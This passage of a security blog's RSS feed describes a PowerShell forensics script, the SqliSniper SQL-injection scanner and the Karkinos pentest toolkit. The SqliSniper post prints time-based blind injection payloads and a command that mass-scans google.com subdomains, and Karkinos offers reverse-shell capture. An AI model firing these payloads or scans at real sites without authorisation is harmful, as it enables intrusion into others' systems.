<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/Scripts/ListInstalledSecurityProducts.ps1" target="_blank" rel="noreferrer noopener nofollow">ListInstalledSecurityProducts</a> – List the installed security products and their status.</li>
<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/Scripts/ListDefenderExclusions.ps1" target="_blank" rel="noreferrer noopener nofollow">ListDefenderExclusions</a> – List the FolderPath, FileExtension, Process and IP exclusions that are defined.</li>
</ul>
<h2 class="wp-block-heading"><strong>DFIR Script – Extracted Artefacts</strong></h2>
<p>The <a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/DFIR-Script.ps1" target="_blank" rel="noreferrer noopener nofollow">DFIR script</a> collects information from multiple sources and structures the output in the current directory in a folder named ‘DFIR-hostname-year-month-date’.</p>
<p>This folder is zipped at the end, so that folder can be remotely collected. This script can also be used within Defender For Endpoint in a Live Response session (see below).</p>
<p>The DFIR script collects the following information when running as normal user:</p>
<ul>
<li>Local IP Info</li>
<li>Open Connections</li>
<li>Aautorun Information (Startup Folder &amp; Registry Run keys)</li>
<li>Active Users</li>
<li>Local Users</li>
<li>Connections Made From Office Applications</li>
<li>Active SMB Shares</li>
<li>RDP Sessions</li>
<li>Active Processes</li>
<li>Active USB Connections</li>
<li>Powershell History</li>
<li>DNS Cache</li>
<li>Installed Drivers</li>
<li>Installed Software</li>
<li>Running Services</li>
<li>Scheduled Tasks</li>
<li>Browser history and profile files</li>
</ul>
<p>For the best experience run the script as admin, then the following items will also be collected:</p>
<ul>
<li>Windows Security Events</li>
<li>Remotely Opened Files</li>
<li>Shadow Copies</li>
<li>MPLogs</li>
<li>Defender Exclusions</li>
</ul>
<h2 class="wp-block-heading"><strong>SIEM Import Functionality</strong></h2>
<p>The forensic artefacts are exported as CSV files, which allows responders to ingest them into their tooling. Some example tools in which you can ingest the data are Sentinel, Splunk, Elastic or Azure Data Explorer. This will allow you to perform filtering, aggregation and visualisation with your preferred query language.</p>
<p>The folder <em>CSV Results (SIEM Import Data)</em> includes all the CSV files containing the artefacts, the folder listing is shown below.</p>
<pre class="wp-block-code"><code>Name
----
ActiveUsers.csv
AutoRun.csv
ConnectedDevices.csv
DefenderExclusions.csv
DNSCache.csv
Drivers.csv
InstalledSoftware.csv
IPConfiguration.csv
LocalUsers.csv
NetworkShares.csv
OfficeConnections.csv
OpenTCPConnections.csv
PowerShellHistory.csv
Processes.csv
RDPSessions.csv
RemotelyOpenedFiles.csv
RunningServices.csv
ScheduledTasks.csv
ScheduledTasksRunInfo.csv
SecurityEvents.csv
ShadowCopy.csv
SMBShares.csv</code></pre>
<h2 class="wp-block-heading"><strong>DFIR Commands</strong></h2>
<p>The <a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/DFIR-Commands.md" target="_blank" rel="noreferrer noopener nofollow">DFIR Commands page</a> contains invidividual powershell commands that can be used during your incident response process. The follwing catagories are defined:</p>
<ul>
<li>Connections</li>
<li>Persistence</li>
<li>Windows Security Events</li>
<li>Processes</li>
<li>User &amp; Group Information</li>
<li>Applications</li>
<li>File Analysis</li>
<li>Collect IOC Information</li>
</ul>
<h2 class="wp-block-heading"><strong>Windows Usage</strong></h2>
<p>The script can be excuted by running the following command.</p>
<pre class="wp-block-code"><code>.\DFIR-Script.ps1</code></pre>
<p>The script is unsigned, that could result in having to use the -ExecutionPolicy Bypass to run the script.</p>
<pre class="wp-block-code"><code>Powershell.exe -ExecutionPolicy Bypass .\DFIR-Script.ps1</code></pre>
<h2 class="wp-block-heading"><strong>DFIR Script | Defender For Endpoit Live Response Integration</strong></h2>
<p>It is possible to use the DFIR Script in combination with the Defender For Endpoint Live Repsonse. Make sure that Live Response is setup (See DOCS). Since my script is usigned a setting change must be made to able to run the script.</p>
<p>There is a blog article available that explains more about how to leverage Custom Script in Live Response: <a href="https://kqlquery.com/posts/leveraging-live-response/" target="_blank" rel="noreferrer noopener nofollow">Incident Response Part 3: Leveraging Live Response</a></p>
<p>To run unsigned scripts live Response:</p>
<ul>
<li>Security.microsoft.com</li>
<li>Settings</li>
<li>Endpoints</li>
<li>Advanced Features</li>
<li>Make sure that Live Response is enabled</li>
<li>If you want to run this on a server enable live resonse for servers</li>
<li>Enable Live Response unsigened script execution</li>
</ul>
<p>Execute script:</p>
<ul>
<li>Go to the device page</li>
<li>Initiate Live Response session</li>
<li>Upload File to library to upload script</li>
<li>After uploading the script to the library execute: <code>run DFIR-script.ps1</code> to start the script.</li>
<li>Execute <code>getfile DFIR-DeviceName-yyyy-mm-dd</code> to download the retrieved artifacts to your local machine for analysis.</li>
</ul>
<h2 class="wp-block-heading"><strong>Docs</strong></h2>
<ul>
<li><a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/live-response?view=o365-worldwide" target="_blank" rel="noreferrer noopener nofollow">Microsoft Documentation Live Response</a></li>
<li><a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/user-roles?view=o365-worldwide" target="_blank" rel="noreferrer noopener nofollow">DFE User permissions</a></li>
<li><a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/advanced-features?view=o365-worldwide#live-response" target="_blank" rel="noreferrer noopener nofollow">Defender For Endpoint Settings Live Response</a></li>
</ul>
<p>The post <a href="http://kostacipo.stream/powershell-digital-forensics-and-incident-response-dfir-leveraging-scripts-for-effective-cybersecurity/">Powershell Digital Forensics And Incident Response (DFIR) – Leveraging Scripts For Effective Cybersecurity</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/powershell-digital-forensics-and-incident-response-dfir-leveraging-scripts-for-effective-cybersecurity/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SqliSniper – Enhancing Web Security By Detecting SQL Injection Vulnerabilities With Python</title>
		<link>http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/</link>
					<comments>http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 23:39:18 +0000</pubDate>
				<category><![CDATA[Data]]></category>
		<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[sql injection]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2177</guid>

					<description><![CDATA[<p>SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/">SqliSniper – Enhancing Web Security By Detecting SQL Injection Vulnerabilities With Python</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>SqliSniper</strong> is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers.</p>
<p>It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency.</p>
<p>Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.</p>
<h2 class="wp-block-heading"><strong>Key Features</strong></h2>
<ul>
<li><strong>Time-Based Blind SQL Injection Detection:</strong> Pinpoints potential SQL injection vulnerabilities in HTTP headers.</li>
<li><strong>Multi-Threaded Scanning:</strong> Offers faster scanning capabilities through concurrent processing.</li>
<li><strong>Discord Notifications:</strong> Sends alerts via Discord webhook for detected vulnerabilities.</li>
<li><strong>False Positive Checks:</strong> Implements response time analysis to differentiate between true positives and false alarms.</li>
<li><strong>Custom Payload and Headers Support:</strong> Allows users to define custom payloads and headers for targeted scanning.</li>
</ul>
<h2 class="wp-block-heading"><strong>Installation</strong></h2>
<pre class="wp-block-code"><code>git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt</code></pre>
<h2 class="wp-block-heading"><strong>Usage</strong></h2>
<p>This will display help for the tool. Here are all the options it supports.</p>
<pre class="wp-block-code"><code>ubuntu:~/sqlisniper$ ./sqlisniper.py -h


███████╗ ██████╗ ██╗     ██╗    ███████╗███╗   ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║     ██║    ██╔════╝████╗  ██║██║██╔══██╗██╔════╝██╔══██╗
███████╗██║   ██║██║     ██║    ███████╗██╔██╗ ██║██║██████╔╝█████╗  ██████╔╝
╚════██║██║▄▄ ██║██║     ██║    ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝  ██╔══██╗
███████║╚██████╔╝███████╗██║    ███████║██║ ╚████║██║██║     ███████╗██║  ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝    ╚══════╝╚═╝  ╚═══╝╚═╝╚═╝     ╚══════╝╚═╝  ╚═╝

                            -: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
                     [--threads THREADS]

Detect SQL injection by sending malicious queries

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL for the target
  -r URLS_FILE, --urls_file URLS_FILE
                        File containing a list of URLs
  -p, --pipeline        Read from pipeline
  --proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        Single payload for testing
  --discord DISCORD     Discord Webhook URL
  --headers HEADERS     File containing headers (default is headers.txt)
  --threads THREADS     Number of threads</code></pre>
<h2 class="wp-block-heading"><strong>Running SqliSniper</strong></h2>
<h3 class="wp-block-heading"><strong>Single Url Scan</strong></h3>
<p>The url can be provided with <code>-u flag</code> for single site scan</p>
<pre class="wp-block-code"><code>./sqlisniper.py -u http://example.com</code></pre>
<h3 class="wp-block-heading"><strong>File Input</strong></h3>
<p>The <code>-r flag</code> allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.</p>
<pre class="wp-block-code"><code>./sqlisniper.py -r url.txt</code></pre>
<h3 class="wp-block-heading"><strong>Piping URLs</strong></h3>
<p>The SqliSniper can also worked with the pipeline input with <code>-p flag</code></p>
<pre class="wp-block-code"><code>cat url.txt | ./sqlisniper.py -p</code></pre>
<p>The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.</p>
<pre class="wp-block-code"><code>subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p</code></pre>
<h3 dir="auto" tabindex="-1">Scanning with custom payloads</h3>
<p dir="auto">By default the SqliSniper use the payloads.txt file. However <code>--payload flag</code> can be used for providing custom payloads file.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>./sqlisniper.py -u http://example.com --payload mssql_payloads.txt</code></pre>
</div>
<p dir="auto">While using the custom payloads file, ensure that you substitute the sleep time with <code>%__TIME_OUT__%</code>. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Scanning with Single Payloads</h3>
<p dir="auto">If you want to only test with the single payload <code>--single-payload flag</code> can be used. Make sure to replace the sleep time with <code>%__TIME_OUT__%</code></p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Scanning Custom Header</h3>
<p dir="auto">Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Sending Discord Alert Notifications</h3>
<p dir="auto">SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>./sqlisniper.py -r url.txt --discord &lt;web_hookurl&gt;
</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Multi-Threading</h3>
<p dir="auto">Threads can be defined with <code>--threads flag</code></p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code> ./sqlisniper.py -r url.txt --threads 10
</code></pre>
<div class="zeroclipboard-container"></div>
</div>
<p dir="auto"><strong>Note:</strong> It is crucial to consider that <strong>employing a higher number of threads might lead to potential false positives or overlooking valid issues</strong>. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.</p>
<hr />
<table style="width: 99.7078%; height: 6px;">
<tbody>
<tr>
<td>
<h2 dir="auto" tabindex="-1">Legal Disclaimer</h2>
</td>
</tr>
</tbody>
</table>
<p dir="auto">Usage of this tool for attacking targets without prior mutual consent is strictly prohibited. It is the end user&#8217;s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.</p>
<p>The post <a href="http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/">SqliSniper – Enhancing Web Security By Detecting SQL Injection Vulnerabilities With Python</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Karkinos &#8211; Penetration Testing and Hacking CTF&#8217;s Swiss Army Knife</title>
		<link>http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/</link>
					<comments>http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 23 Jan 2023 19:31:24 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Penetration Testing Framework]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2145</guid>

					<description><![CDATA[<p>What is Karkinos? Karkinos is a light-weight &#8216;Swiss Army Knife&#8217; for penetration testing and/or hacking CTF&#8217;s. Currently, Karkinos offers the following: Encoding/Decoding characters Encrypting/Decrypting text or files 3 Modules Cracking and generating hashes Disclaimer This tool should be used on applications/networks that you have permission to attack only. Any misuse or damage caused will be [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/">Karkinos &#8211; Penetration Testing and Hacking CTF&#8217;s Swiss Army Knife</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2><strong>What is Karkinos?</strong></h2>
<p dir="auto">Karkinos is a light-weight &#8216;Swiss Army Knife&#8217; for penetration testing and/or hacking CTF&#8217;s. Currently, Karkinos offers the following:</p>
<ul dir="auto">
<li>Encoding/Decoding characters</li>
<li>Encrypting/Decrypting text or files</li>
<li>3 Modules</li>
<li>Cracking and generating hashes</li>
</ul>
<h2><strong>Disclaimer</strong></h2>
<p>This tool should be used on applications/networks that you have permission to attack only. Any misuse or damage caused will be solely the users’ responsibility.</p>
<p>More: <a href="https://github.com/helich0pper/Karkinos" target="_blank" rel="noopener">https://github.com/helich0pper/Karkinos</a></p>
<h2><strong>Dependencies</strong></h2>
<ul>
<li>Any server capable of hosting PHP; tested with Apache Server</li>
<li>Tested with PHP 7.4.9</li>
<li>Tested with Python 3.8<br />
Make sure it is in your path as:<br />
Windows: <code>python</code><br />
Linux: <code>python3</code><br />
If it is not, please change the commands in <code>includes/pid.php</code></li>
<li>pip3</li>
<li>Raspberry Pi Zero friendly <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> (crack hashes at your own risk)</li>
</ul>
<h2><a id="user-content-installing" class="anchor" href="https://github.com/helich0pper/Karkinos#installing" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Installing</strong></h2>
<p>This installation guide assumes you have all the dependencies. A Wiki page with troubleshooting steps can be found <a href="https://helich0pper.github.io/karkinos/" target="_blank" rel="nofollow noopener">here</a>.</p>
<h3><a id="user-content-linuxbsd" class="anchor" href="https://github.com/helich0pper/Karkinos#linuxbsd" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Linux/BSD</strong></h3>
<ol dir="auto">
<li><code>git clone https://github.com/helich0pper/Karkinos.git</code></li>
<li><code>cd Karkinos</code></li>
<li><code>pip3 install -r requirements.txt</code></li>
<li><code>cd wordlists &amp;&amp; unzip passlist.zip</code> You can also unzip it manually using file explorer. Just make sure passlist.txt is in <strong>wordlists</strong> directory.</li>
<li><code>Make sure you have write privileges for db/main.db</code></li>
<li>Enable <code>extension=mysqli</code> in your php.ini file.<br />
If you don&#8217;t know where to find this, refer to the PHP <a href="https://www.php.net/manual/en/configuration.file.php#:~:text=d%20php%20PHP%20will%20load,ini%20as%20configuration%20files." target="_blank" rel="nofollow noopener">docs</a>. Note: MySQLi is only used to store statistics.</li>
<li>Thats it! Now just host it using your preferred web server or run: <code>php -S 127.0.0.1:8888</code> in the Karkinos directory.<strong>Important: using port 5555, 5556, or 5557 will conflict with the Modules</strong><br />
If you insist on using these ports, change the <code>PORT</code> value in:</li>
</ol>
<ul>
<li>
<ul dir="auto">
<li><code>/bin/Server/app.py Line 87</code></li>
<li><code>/bin/Busting/app.py Line 155</code></li>
<li><code>/bin/PortScan/app.py Line 128</code></li>
</ul>
</li>
</ul>
<h2 dir="auto"><strong>Windows</strong></h2>
<ol dir="auto">
<li><code>git clone https://github.com/helich0pper/Karkinos.git</code></li>
<li><code>cd Karkinos</code></li>
<li><code>pip3 install -r requirements.txt</code></li>
<li><code>cd wordlists &amp;&amp; unzip passlist.zip</code><br />
You can also unzip it manually using file explorer. Just make sure passlist.txt is in <strong>wordlists</strong> directory.</li>
<li><code>Make sure you have write privileges for db/main.db</code></li>
<li>Enable <code>extension=mysqli.dll</code> in your php.ini file.<br />
If you don&#8217;t know where to find this, refer to the PHP <a href="https://www.php.net/manual/en/configuration.file.php#:~:text=d%20php%20PHP%20will%20load,ini%20as%20configuration%20files." target="_blank" rel="nofollow noopener">docs</a>. Note: MySQLi is only used to store statistics</li>
<li>Thats it! Now just host it using your preferred web server or run: <code>php -S 127.0.0.1:8888</code> in the Karkinos directory.<strong>Important: using port 5555, 5556, or 5557 will conflict with the Modules</strong><br />
If you insist on using these ports, change the <code>PORT</code> value in:</li>
</ol>
<ul dir="auto">
<li><code>/bin/Server/app.py Line 87</code></li>
<li><code>/bin/Busting/app.py Line 155</code></li>
<li><code>/bin/PortScan/app.py Line 128</code></li>
</ul>
<h3><a id="user-content-home-menu" class="anchor" href="https://github.com/helich0pper/Karkinos#home-menu" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Home Menu</strong></h3>
<p>Landing page and quick access menu.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/home-4.png"><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-232590" src="https://hakin9.org/wp-content/uploads/2020/12/home-4.png" sizes="(max-width: 1327px) 100vw, 1327px" srcset="https://hakin9.org/wp-content/uploads/2020/12/home-4.png 1327w, https://hakin9.org/wp-content/uploads/2020/12/home-4-378x251.png 378w, https://hakin9.org/wp-content/uploads/2020/12/home-4-565x376.png 565w, https://hakin9.org/wp-content/uploads/2020/12/home-4-460x306.png 460w, https://hakin9.org/wp-content/uploads/2020/12/home-4-1024x681.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/home-4-768x510.png 768w, https://hakin9.org/wp-content/uploads/2020/12/home-4-500x332.png 500w, https://hakin9.org/wp-content/uploads/2020/12/home-4-200x133.png 200w, https://hakin9.org/wp-content/uploads/2020/12/home-4-120x80.png 120w, https://hakin9.org/wp-content/uploads/2020/12/home-4-310x206.png 310w" alt="" width="1327" height="882" /></a></p>
<p>User stats are displayed here. Currently, the stats recorded are only the total hashes and hash types cracked successfully.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/home2-3.png"><img decoding="async" class="alignnone size-full wp-image-232591" src="https://hakin9.org/wp-content/uploads/2020/12/home2-3.png" sizes="(max-width: 1103px) 100vw, 1103px" srcset="https://hakin9.org/wp-content/uploads/2020/12/home2-3.png 1103w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-378x309.png 378w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-565x463.png 565w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-460x377.png 460w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-1024x838.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-768x629.png 768w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-500x409.png 500w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-200x164.png 200w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-120x98.png 120w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-310x254.png 310w" alt="" width="1103" height="903" /></a></p>
<h3><strong>Encoding/Decoding</strong></h3>
<p>This page allows you to encode/decode in common formats (more may be added soon)</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/encode.png"><img decoding="async" class="alignnone wp-image-192571" src="https://hakin9.org/wp-content/uploads/2020/12/encode.png" sizes="(max-width: 798px) 100vw, 798px" srcset="https://hakin9.org/wp-content/uploads/2020/12/encode.png 1636w, https://hakin9.org/wp-content/uploads/2020/12/encode-378x208.png 378w, https://hakin9.org/wp-content/uploads/2020/12/encode-565x311.png 565w, https://hakin9.org/wp-content/uploads/2020/12/encode-460x253.png 460w, https://hakin9.org/wp-content/uploads/2020/12/encode-1024x564.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/encode-768x423.png 768w, https://hakin9.org/wp-content/uploads/2020/12/encode-1536x846.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/encode-500x275.png 500w, https://hakin9.org/wp-content/uploads/2020/12/encode-200x110.png 200w, https://hakin9.org/wp-content/uploads/2020/12/encode-120x66.png 120w, https://hakin9.org/wp-content/uploads/2020/12/encode-310x171.png 310w" alt="" width="798" height="439" /></a></p>
<h3><strong>Encrypt/Decrypt</strong></h3>
<p>Encrypting and decrypting text or files is made easy and is fully trusted since it is done locally.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/encrypt.png"><img loading="lazy" decoding="async" class="alignnone wp-image-192593" src="https://hakin9.org/wp-content/uploads/2020/12/encrypt.png" sizes="auto, (max-width: 853px) 100vw, 853px" srcset="https://hakin9.org/wp-content/uploads/2020/12/encrypt.png 1746w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-378x190.png 378w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-565x284.png 565w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-460x232.png 460w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-1024x516.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-768x387.png 768w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-1536x773.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-500x252.png 500w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-200x101.png 200w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-120x60.png 120w, https://hakin9.org/wp-content/uploads/2020/12/encrypt-310x156.png 310w" alt="" width="853" height="430" /></a></p>
<h3><strong>Reverse Shell Handling</strong></h3>
<p>Reverse shells can be captured and interacted with on this page.</p>
<h3><a id="user-content-create-a-listener-instance" class="anchor" href="https://github.com/helich0pper/Karkinos#create-a-listener-instance" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Create a listener instance</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/reverse-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232592" src="https://hakin9.org/wp-content/uploads/2020/12/reverse-1.png" sizes="auto, (max-width: 1734px) 100vw, 1734px" srcset="https://hakin9.org/wp-content/uploads/2020/12/reverse-1.png 1734w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-378x194.png 378w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-565x291.png 565w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-460x237.png 460w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-1024x527.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-768x395.png 768w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-1536x790.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-500x257.png 500w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-200x103.png 200w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-120x62.png 120w, https://hakin9.org/wp-content/uploads/2020/12/reverse-1-310x159.png 310w" alt="" width="1734" height="892" /></a></p>
<h3><strong>Configure the listener</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232593" src="https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1.png" sizes="auto, (max-width: 1875px) 100vw, 1875px" srcset="https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1.png 1875w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-378x154.png 378w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-565x231.png 565w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-460x188.png 460w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-1024x418.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-768x314.png 768w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-1536x628.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-500x204.png 500w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-200x82.png 200w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-120x49.png 120w, https://hakin9.org/wp-content/uploads/2020/12/reverse2-2-1-310x127.png 310w" alt="" width="1875" height="766" /></a></p>
<h3><strong>Start the listener and capture a shell</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/reverse3-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232594" src="https://hakin9.org/wp-content/uploads/2020/12/reverse3-1.png" sizes="auto, (max-width: 1861px) 100vw, 1861px" srcset="https://hakin9.org/wp-content/uploads/2020/12/reverse3-1.png 1861w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-378x166.png 378w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-565x248.png 565w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-460x202.png 460w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-1024x450.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-768x337.png 768w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-1536x674.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-500x220.png 500w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-200x88.png 200w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-120x53.png 120w, https://hakin9.org/wp-content/uploads/2020/12/reverse3-1-310x136.png 310w" alt="" width="1861" height="817" /></a></p>
<h3 dir="auto"><strong>Full reverse shell handling demo:</strong></h3>
<div class="fluid-width-video-wrapper"><iframe src="https://www.youtube.com/embed/zriDUmHimXE?modestbranding=1" name="fitvid0" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></div>
<h2 dir="auto"><strong>Directory and File Busting</strong></h2>
<h3 dir="auto"><a id="user-content-create-an-instance" class="anchor" href="https://github.com/helich0pper/Karkinos#create-an-instance" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Create an instance</strong></h3>
